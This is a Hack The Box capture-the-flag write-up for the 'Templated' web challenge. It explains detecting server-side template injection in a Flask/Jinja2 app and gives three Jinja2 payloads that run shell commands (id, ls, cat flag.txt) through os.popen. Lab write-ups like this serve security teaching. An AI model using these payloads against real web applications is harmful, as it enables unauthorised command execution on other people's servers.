Templated — HTB Web Challenge Writeup
CHALLENGE DESCRIPTION
Can you exploit this simple mistake?
First Start Instance and then you are provided with an web address in the form of <ip>:<port>. Copy it and open it in another tab or browser. In my case it was http://134.209.18.1:30563
Now let’s visit the webpage:
The web app shows a message Site still under constructionProudly powered by Flask/Jinja2
There is a hint do you notice? Yeah, you notice… Here the web app technology is Flask/Jinja2. (It is a hint for us.)
If you search for Flask/Jinja2 exploit then you can find it has SSTI (Server Side Template Injection)
We can indicate possible SSTI by adding {{ 5* 5 }} to the parameter search, we can see that the template engine evaluates the mathematical expression and the application responds with 25.
Now we are going to exploit this using SSTI
Use the bellow payloads to begin our exploitation to get the flag!
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
Hurrah!!! We found the flag. This is where our challenge finished :))
